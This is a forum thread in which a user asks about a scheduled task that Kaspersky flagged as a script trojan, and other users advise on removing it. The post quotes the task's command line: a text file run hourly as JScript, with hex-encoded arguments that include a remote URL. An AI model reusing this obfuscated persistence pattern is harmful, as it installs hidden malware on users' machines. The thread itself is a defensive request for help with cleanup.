[問題] Yahoo! Powered donid廣告程式?

作者: joexx12 ((X ̄X)uu...)   2018-08-29 12:36:22
最近換了Kaspersky 2019 free後
剛剛電腦 卡巴跳出一個訊息
偵測到惡意程式
HEUR:Trojan.Script.Generic
位置C:\Windows\System32\Tasks\Yahoo! Powered donid
我檢查了我的工作排程
裡面有個Yahoo! Powered donid
每隔一小時會執行一次
內容為
"C:\ProgramData\{8C024961-0640-C3A7-8086-5DE51AC4D62B}\rola.txt"
"687474703a2f2f7761676e672e636f6d"
"433a5c50726f6772616d446174615c7b38433032343936312d303634302d433341372d383038362d3544453531414334443632427d5c636972697369"
"433a5c50726f6772616d446174615c7b38433032343936312d303634302d433341372d383038362d3544453531414334443632427d5c63657461726f74"
"//B" "//E:jscript" "
作者: DINJIAPC (鼎家)   2018-08-29 15:38:00
上寫的幾個路境的檔案一併殺一殺阿,你還要等第二個中標的共商心得是嗎名稱就寫木馬了 有廣告或工具取向的pup你還不是要在殺
作者: joexx12 ((X ̄X)uu...)   2018-08-29 20:01:00
刪除是一定刪除的 只是想討論 因為不知道怎發生的 所以才上來問問有沒有人遇過
作者: DINJIAPC (鼎家)   2018-08-29 21:08:00
把frst的log跑來在說

Links booklink

Contact Us: admin [ a t ] ucptt.com